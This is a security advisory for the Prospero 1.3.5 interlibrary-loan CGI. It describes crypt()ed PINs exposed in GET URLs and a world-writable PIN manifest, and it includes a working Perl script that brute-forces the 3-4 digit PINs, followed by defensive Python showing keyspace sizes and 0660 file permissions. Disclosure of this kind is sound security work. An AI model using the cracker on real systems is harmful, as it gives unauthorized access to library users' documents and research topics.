COMMAND
Prospero
SYSTEMS AFFECTED
Prospero 1.3.5 CGI
PROBLEM
'darkyoda' found the following. Prospero is a Web-based document
delivery system designed as a complement to the Ariel software
system. Ariel is a product of the Research Libraries Group (RLG)
which allows libraries to use the Internet to exchange documents
through interlibrary loan.
Client-side Prospero generates a random 3 or 4 digit PIN that
users enter into a web-based form that grants them access to
documents requested through interlibrary loan. Because the form
uses the GET method, the encrypted PIN is visible in the browser
(in the URL, and therefore in the history and in any proxy or
server logs). A perusal of login.pl reveals that the Perl crypt()
function is used to encrypt the PIN. Since the PIN is at most four
decimal digits, it is trivial for an attacker to determine it by
brute force; this gives access to the user's documents, allowing a
malicious user to delete them arbitrarily or to determine the
subject of the user's research.
In addition, login.pl creates its log and manifest files with 0666
permissions. The manifest file is the user database containing PINs
and usernames. Any local account, whether or not it is a Prospero
user, can modify or delete entries in this file at will.
Exploit:
#!/usr/bin/perl
#
# crack for prospero PINs
# dY 12.15.00
#
use strict;
use warnings;

# Read the crypt()ed PIN exactly as it appears in the GET request.
print "Enter encrypted PIN: ";
chomp(my $passwd = <STDIN>);

# Traditional crypt() output carries its two-character salt as a prefix,
# so the salt needed to re-hash each guess is right there in the input.
my $salt = substr($passwd, 0, 2);

# Prospero PINs are 3 or 4 decimal digits, so 0..9999 covers the keyspace.
my $lowval  = 0;
my $highval = 9999;
for (my $i = $lowval; $i <= $highval; $i++) {
    if (crypt($i, $salt) eq $passwd) {
        print "***Unencrypted PIN is: $i\n";
        exit(0);
    }
}
print "Sorry, couldn't crack it. Try something > $highval.\n";
exit(0);
SOLUTION
Upgrade to the latest version 1.3.7. Note that the author has not
reviewed the source of this latest version. Clients who cannot
upgrade should change the file permissions in login.pl to 0660
and consider using complex alphanumeric PINs in lieu of the ones
generated by Prospero. Note that this will only slow an attacker,
as the hash could still be brute-forced by an industrial password
cracker such as John the Ripper.
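The following Python is an added illustration, not part of the original advisory and not Prospero's code. It quantifies the two mitigations above: how much larger the guess space of a complex alphanumeric PIN is than Prospero's 3 or 4 digit one (the guesses-per-second rate used for the time estimate is a constructed figure, not a measured crypt() throughput), and how to create the manifest and log files with 0660 instead of 0666 so that other local accounts cannot edit the PIN database. The manifest entries and the write_manifest/demo_manifest helpers are constructed for the example; login.pl's actual file-handling code is not shown on the page.

```python
import os
import secrets
import stat
import string
import tempfile

# Alphabets for the two PIN schemes discussed in the advisory.
DIGITS = string.digits                            # Prospero's own 3/4-digit PINs
ALNUM = string.ascii_letters + string.digits      # the suggested "complex alphanumeric" PIN


def keyspace(alphabet, length):
    """Number of distinct PINs of exactly `length` symbols over `alphabet`.

    This is the worst-case number of crypt() calls an exhaustive guess
    needs, which is what the advisory's cracker does for 0..9999.
    """
    return len(alphabet) ** length


def seconds_to_exhaust(alphabet, length, guesses_per_second):
    """Worst-case wall time to try every PIN at a given hash rate.

    The rate is supplied by the caller; any value here is constructed and
    not a measurement of a real cracker.
    """
    return keyspace(alphabet, length) / guesses_per_second


def generate_pin(alphabet=ALNUM, length=8):
    """Generate a PIN from the OS CSPRNG rather than a predictable rand()."""
    return "".join(secrets.choice(alphabet) for _ in range(length))


def write_manifest(path, entries, mode=0o660):
    """Create a manifest/log file and force `mode` on it.

    The advisory reports login.pl used 0666, leaving the PIN database
    world-writable. O_EXCL refuses to clobber an existing file, and the
    explicit chmod afterwards makes the final mode independent of umask.
    Returns the resulting permission bits so callers can verify them.
    """
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, mode)
    with os.fdopen(fd, "w") as fh:
        fh.write("".join(line + "\n" for line in entries))
    os.chmod(path, mode)
    return stat.S_IMODE(os.stat(path).st_mode)


def world_writable(path):
    """True if any local user could modify or delete entries in the file."""
    return bool(os.stat(path).st_mode & stat.S_IWOTH)


def demo_manifest():
    """Write a constructed two-entry manifest both ways and compare modes."""
    tmp = tempfile.mkdtemp()
    entries = ["alice 1234", "bob 987"]          # constructed sample entries
    safe = os.path.join(tmp, "manifest.0660")
    unsafe = os.path.join(tmp, "manifest.0666")
    safe_mode = write_manifest(safe, entries, mode=0o660)
    unsafe_mode = write_manifest(unsafe, entries, mode=0o666)
    return (safe_mode, world_writable(safe), unsafe_mode, world_writable(unsafe))


if __name__ == "__main__":
    rate = 1_000_000  # constructed guesses/second, for scale only
    for name, alphabet, length in (("4-digit numeric", DIGITS, 4),
                                   ("8-char alphanumeric", ALNUM, 8)):
        print(f"{name}: {keyspace(alphabet, length):,} candidates, "
              f"worst case {seconds_to_exhaust(alphabet, length, rate):,.0f} s "
              f"at {rate:,} guesses/s")
    print("sample alphanumeric PIN:", generate_pin())
    print("manifest modes (safe, world-writable?, unsafe, world-writable?):",
          demo_manifest())
```

The keyspace comparison is the substance of the "only slows an attacker" caveat: four digits is 10,000 guesses and is exhausted instantly, while eight alphanumeric characters is about 2.2 x 10^14, which is no longer a one-second job but is still within reach of a cracker running against a fast hash like traditional crypt(). The permission helper shows the other fix: a file created with 0666 fails the world_writable check, one created with 0660 passes it.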